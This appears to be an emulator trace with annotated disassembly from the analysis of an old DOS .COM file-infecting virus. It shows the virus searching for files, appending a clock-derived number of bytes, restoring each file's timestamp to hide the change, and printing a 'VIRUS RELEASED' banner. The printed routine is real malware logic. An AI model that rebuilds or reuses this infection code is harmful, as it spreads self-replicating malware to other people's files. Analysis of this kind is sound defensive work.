2018-12-17T21:59:20.922732594Z 44 PC: 12e2d | Get time 0x12e2d: mov cl, dl
; Disassembly window logged at the return address of the first "Get time" call
; (the trace line above holds 0x12e2d: mov cl, dl). It derives a clock-based byte
; count, writes that many bytes to the open file, re-applies a file date/time and closes it.
0x12e2f: mov al, cl                 ; AL = CL; both copies are overwritten below (AL at 0x12e31, CL at 0x12e36)
0x12e31: mov ax, 0x2c00             ; AH=2Ch: DOS Get System Time (DL returns hundredths of a second)
0x12e34: int 0x21                   ; second clock read; the trace logs it with PC 12e36, the return address
0x12e36: mov cl, dl                 ; CL = hundredths from the second read
0x12e38: add cl, al                 ; NOTE(review): AH=2Ch documents no AL result; value of AL here unconfirmed
0x12e3a: ror cl, 1                  ; bit 0 rotates into bit 7, so odd inputs give counts above 127
0x12e3c: xor ch, ch                 ; CX = CL: byte count for the write below
0x12e3e: xor dx, dx                 ; buffer offset 0 in DS; presumably the PSP of a .COM program (confirm)
0x12e40: mov ah, 0x40               ; AH=40h: Write to File or Device, CX bytes from DS:DX
0x12e42: int 0x21                   ; BX (handle) is set outside this window; trace counts range 32..168 across files
0x12e44: mov cx, word ptr [0x22a]   ; CX = word at DS:022Ah, passed as the file time
0x12e48: mov dx, word ptr [0x228]   ; DX = word at DS:0228h, passed as the file date
0x12e4c: mov ax, 0x5701             ; AX=5701h: Set File Date and Time
0x12e4f: int 0x21                   ; presumably the stamp read at PC 12e01 (confirm); mtime then does not reveal the write
0x12e51: mov ah, 0x3e               ; AH=3Eh: Close File
0x12e53: int 0x21
0x12e55: mov ah, 0x4f               ; AH=4Fh: Find Next File
0x12e57: jmp 0x12d89                ; back into the search loop; the trace logs Find next file at PC 12d8f
0x12e5a: mov ah, 0x1a               ; AH=1Ah: Set Disk Transfer Address; not reached from the jmp above
2018-12-17T21:59:20.925155545Z 44 PC: 12e36 | Get time 0x12e36: mov cl, dl
; Disassembly window logged at the return address of the second "Get time" call
; (the trace line above holds 0x12e36: mov cl, dl, i.e. CL = hundredths of a second).
0x12e38: add cl, al                 ; NOTE(review): AH=2Ch documents no AL result; value of AL here unconfirmed
0x12e3a: ror cl, 1                  ; bit 0 rotates into bit 7, so odd inputs give counts above 127
0x12e3c: xor ch, ch                 ; CX = CL: byte count for the write below
0x12e3e: xor dx, dx                 ; buffer offset 0 in DS; presumably the PSP of a .COM program (confirm)
0x12e40: mov ah, 0x40               ; AH=40h: Write to File or Device, CX bytes from DS:DX
0x12e42: int 0x21                   ; BX (handle) is set outside this window; trace counts range 32..168 across files
0x12e44: mov cx, word ptr [0x22a]   ; CX = word at DS:022Ah, passed as the file time
0x12e48: mov dx, word ptr [0x228]   ; DX = word at DS:0228h, passed as the file date
0x12e4c: mov ax, 0x5701             ; AX=5701h: Set File Date and Time
0x12e4f: int 0x21                   ; presumably the stamp read at PC 12e01 (confirm); mtime then does not reveal the write
0x12e51: mov ah, 0x3e               ; AH=3Eh: Close File
0x12e53: int 0x21
0x12e55: mov ah, 0x4f               ; AH=4Fh: Find Next File
0x12e57: jmp 0x12d89                ; back into the search loop; the trace logs Find next file at PC 12d8f
0x12e5a: mov ah, 0x1a               ; AH=1Ah: Set Disk Transfer Address; not reached from the jmp above
0x12e5c: mov dx, 0x80               ; DS:0080h, the default DTA location in the PSP
0x12e5f: int 0x21                   ; the trace logs this call once, at PC 12e61, after the last Find next file
0x12e61: mov bx, 0x102
0x12e64: pop word ptr [bx]          ; stack word -> DS:0102h; presumably restores host bytes near the 0100h entry (confirm)
2018-12-17T21:59:20.927261528Z 64 PC: 12e44 | Write file or device (Write 46 bytes on handle 5)
2018-12-17T21:59:20.930119603Z 87 PC: 12e51 | Get or set file date and time
2018-12-17T21:59:20.932038361Z 62 PC: 12e55 | Close file
2018-12-17T21:59:20.939221001Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.941907944Z 47 PC: 12d9b | Get disk transfer address
2018-12-17T21:59:20.943536836Z 67 PC: 12dc3 | Get or set file attributes
2018-12-17T21:59:20.952890788Z 61 PC: 12dd1 | Open file (Filename = 'TEST.COM')
2018-12-17T21:59:20.960069015Z 63 PC: 12dea | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:59:20.962969513Z 79 PC: 12d8f | Find next file
2018-12-17T21:59:20.965260056Z 26 PC: 12e61 | Set disk transfer address
2018-12-17T21:59:20.966316911Z 9 PC: 12a47 | Display string (String= '-=-=-= WARNING!! VIRUS RELEASED! =-=-=- NORMAL CARRIER FILE SIZE IS 800 BYTES (C) 1994 - SECTOR INFECTOR INC ')